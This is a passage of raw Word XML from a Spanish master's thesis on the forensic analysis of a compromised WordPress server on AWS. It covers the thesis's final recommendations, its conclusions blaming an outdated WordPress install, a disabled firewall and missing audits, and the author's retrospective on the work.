        <w:t>Revisión de los protocolos o procesos de securización de los activos de la empresa de la empresa e implementar nuevos protocolos si fuese necesario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430C2F58" w14:textId="3979A219" w:rsidR="004D52A1" w:rsidRPr="00BB381F" w:rsidRDefault="008D7AFF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Realización de una auditoría interna y posteriormente externa del servidor web de la empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A634E" w14:textId="194D1C81" w:rsidR="004D52A1" w:rsidRPr="00BB381F" w:rsidRDefault="008D7AFF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Elevar, si procede, a las autoridades competentes</w:t>
      </w:r>
      <w:r w:rsidR="004D52A1" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, en caso de España sería el INCIBE, un informe de</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> los hechos producidos</w:t>
      </w:r>
      <w:r w:rsidR="004D52A1" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">n caso de elevarse también por </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vía</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> judicial, elevar propuesta de solicitud de datos a Amazon Web Ser</w:t>
      </w:r>
      <w:r w:rsidR="004D52A1" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vices</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="004D52A1" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del responsable de la instancia contratada entre el </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>30 de diciembre de 2018 a las 11:46:38 UTC y el 03 de enero de 2019 a las 07:07:28 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA3739" w14:textId="24237978" w:rsidR="004D52A1" w:rsidRPr="00BB381F" w:rsidRDefault="004D52A1">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF7A7BD" w14:textId="2C6DC523" w:rsidR="004D52A1" w:rsidRDefault="004D52A1" w:rsidP="004D52A1">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc155782521"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Conclusiones.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="475CED72" w14:textId="77777777" w:rsidR="00C4186B" w:rsidRDefault="00C4186B" w:rsidP="00C4186B"/>
    <w:p w14:paraId="3E589DAE" w14:textId="023CCDF6" w:rsidR="008C0ABC" w:rsidRDefault="008C0ABC" w:rsidP="008C0ABC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc155782522"/>
      <w:r>
        <w:t>7.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Conclusiones Finales.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="6E290636" w14:textId="77777777" w:rsidR="008C0ABC" w:rsidRPr="00BB381F" w:rsidRDefault="008C0ABC" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C419A1E" w14:textId="6BC24650" w:rsidR="00CB6E36" w:rsidRPr="00BB381F" w:rsidRDefault="00C4186B" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Las conclusiones del resultado han quedado constatadas tanto en el resumen ejecutivo como en el informe pericial, siendo un poco más técnico en este segundo informe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257ACDC2" w14:textId="7DFDC551" w:rsidR="00D00A85" w:rsidRPr="00BB381F" w:rsidRDefault="00D00A85" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estos accidentes fatales, informáticamente hablando, ocurren seguramente por una cadena de incidentes no controlados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C575CCB" w14:textId="4012D210" w:rsidR="00CB6E36" w:rsidRPr="00BB381F" w:rsidRDefault="00D00A85" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Personalmente, el primer desencadenante de todo l</w:t>
      </w:r>
      <w:r w:rsidR="00CB6E36" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">o ocurrido </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>se puede deducir</w:t>
      </w:r>
      <w:r w:rsidR="00CB6E36" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que ha sido debido a que se ha instalado una aplicación </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>totalmente desactualizada de WordPress, estando disponible desde el 12 de diciembre de 2018 la version 5.0.1.</w:t>
      </w:r>
      <w:r w:rsidR="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s decir</w:t>
      </w:r>
      <w:r w:rsidR="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9 días antes de la creación del servidor virtual en AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Es decir, desde este primer paso, creo que empezamos mal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B80F3" w14:textId="059F972D" w:rsidR="00200ECD" w:rsidRPr="00BB381F" w:rsidRDefault="00D00A85" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El siguiente incidente no controlado, podemos definirlo como la no revisión de</w:t>
      </w:r>
      <w:r w:rsidR="001D3493" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l firewall</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Firewall: Dispositivo de seguridad de red que monitorea y controla el tráfico de red entrante y saliente basado en un conjunto de reglas de seguridad.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="001D3493" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para un correcto control de accesos. Servicios de computación en la nube, el caso de AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="001D3493" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, configuran este tipo de servidores totalmente “en blanco”, para que sea el usuario quien lo configure, de hecho, haciendo esta conclusión, he procedido ver el </w:t>
      </w:r>
      <w:r w:rsidR="00FF5381" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r w:rsidR="001D3493" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00200ECD" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">investigando /etc/efw/ufw.conf, está en ENABLED=no y LOGLEVEL=low, por lo que claramente, no fue modificado. Si esta regla se hubiera definido de tal manera que nadie hubiera accedido al sistema ni por ganga.site/admin ni por </w:t>
      </w:r>
      <w:r w:rsidR="00FF5381" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidR="00200ECD" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> al servidor, la cosa hubiera sido distinta. Muchas veces somos inconscientes de la cantidad de servidores que se tratan de vulnerar por todas partes y, lo que un firewall, o incluso un router de un ISP tiene que soportar todos los días.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49195208" w14:textId="1D931892" w:rsidR="00200ECD" w:rsidRPr="00BB381F" w:rsidRDefault="00200ECD" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El tercer</w:t>
      </w:r>
      <w:r w:rsidR="00AD31E6" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> incidente en cadena no controlado, es posiblemente una falta de realización de pruebas y de una </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auditoría</w:t>
      </w:r>
      <w:r w:rsidR="00AD31E6" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interna del servidor, el hacer comprobaciones de este tipo siempre es positivo. Pasarle una auditoría por Nessus posiblemente hubiese detectado las vulnerabilidades </w:t>
      </w:r>
      <w:r w:rsidR="00FF5381" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de WordPress. En este sentido, en ambos informes elevo propuesta de hacer en cierta manera un sandbox</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Sandbox: Entorno de prueba aislado donde se pueden ejecutar programas o archivos sin afectar al sistema principal.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FF5381" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para comprobar el correcto funcionamiento del servidor antes de pasarlo a producción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A1F905" w14:textId="49E4D540" w:rsidR="00FF5381" w:rsidRPr="00BB381F" w:rsidRDefault="00FF5381" w:rsidP="00BB381F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En definitiva, una cadena de incidentes no </w:t>
      </w:r>
      <w:r w:rsidR="004552FE" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controlados</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede dar un desenlace fatal de este tipo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53902A4C" w14:textId="77777777" w:rsidR="008C0ABC" w:rsidRDefault="008C0ABC" w:rsidP="00BB381F"/>
    <w:p w14:paraId="0025DB23" w14:textId="67FB953F" w:rsidR="00FF5381" w:rsidRPr="008C0ABC" w:rsidRDefault="008C0ABC" w:rsidP="008C0ABC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc155782523"/>
      <w:r>
        <w:t>7.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FF5381" w:rsidRPr="008C0ABC">
        <w:t>Retrospectiv</w:t>
      </w:r>
      <w:r w:rsidR="009E7AEF" w:rsidRPr="008C0ABC">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00FF5381" w:rsidRPr="008C0ABC">
        <w:t xml:space="preserve"> del TFM.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="52F0D4C0" w14:textId="77777777" w:rsidR="008C0ABC" w:rsidRPr="00BB381F" w:rsidRDefault="008C0ABC" w:rsidP="00C4186B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E53A7D5" w14:textId="6C06903E" w:rsidR="009E7AEF" w:rsidRPr="00BB381F" w:rsidRDefault="00FF5381" w:rsidP="00C4186B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por último y no menos importante, voy a hacer una </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retrospectiva</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del TFM.</w:t>
      </w:r>
      <w:r w:rsidR="008C0ABC" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> En este apartado voy a hacer un </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto juicio</w:t>
      </w:r>
      <w:r w:rsidR="008C0ABC" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> crítico de como he realizado el TFM, siendo autocrítico. Para ello voy a dividirlo en 4 partes: que es lo que me ha gustado, que es lo que no me ha gustado, que he aprendido, que haría diferente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4E43B" w14:textId="5702EDF0" w:rsidR="008C0ABC" w:rsidRPr="00BB381F" w:rsidRDefault="008C0ABC" w:rsidP="00C4186B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo a </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>este apartado</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> no voy a entrar en muchos detalles, simplemente anotarlos para que en caso de tener que hacer otro trabajo como este, lo tenga como referencia, quizás sirva a otros alumnos como retroalimentación y una </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>guía</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de consejos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07361625" w14:textId="444257B3" w:rsidR="008C0ABC" w:rsidRPr="00BB381F" w:rsidRDefault="00BB381F" w:rsidP="00C4186B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Que es lo que me ha gustado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDE796A" w14:textId="41C6684D" w:rsidR="009E7AEF" w:rsidRPr="00BB381F" w:rsidRDefault="00DA20D3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="008C0ABC" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tarea de realizar una línea temporal es importantísima para detectar el </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cuándo</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="004552FE" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cómo</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se ha realizado la intrusión en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19312E" w14:textId="3CF2CA9D" w:rsidR="00DA20D3" w:rsidRPr="00BB381F" w:rsidRDefault="00D73AAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lo importante es tener una guía de a donde llegar y los objetivos. Por lo que es importante es tener una planificación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ACF314" w14:textId="22678C5B" w:rsidR="00D73AAA" w:rsidRPr="00BB381F" w:rsidRDefault="00D73AAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ha sido un reto personal, </w:t>
      </w:r>
      <w:r w:rsidR="00FE5B69" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>los impedimentos por temas laborales y familiares han sido un reto diario. El cual creo que he superado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FAAA84" w14:textId="44EEE9A6" w:rsidR="00D73AAA" w:rsidRPr="00BB381F" w:rsidRDefault="00BB381F" w:rsidP="00D73AAA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Que es lo no que me ha gustado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B28BE" w14:textId="23B0823D" w:rsidR="00D73AAA" w:rsidRPr="00BB381F" w:rsidRDefault="00FE5B69">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No poder seguir la guía de trabajo como hubiera deseado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E98E34" w14:textId="51AB168A" w:rsidR="00FE5B69" w:rsidRPr="00BB381F" w:rsidRDefault="00FE5B69">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No he definido bien una estrategia de </w:t>
      </w:r>
      <w:r w:rsidR="00AD4A46" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
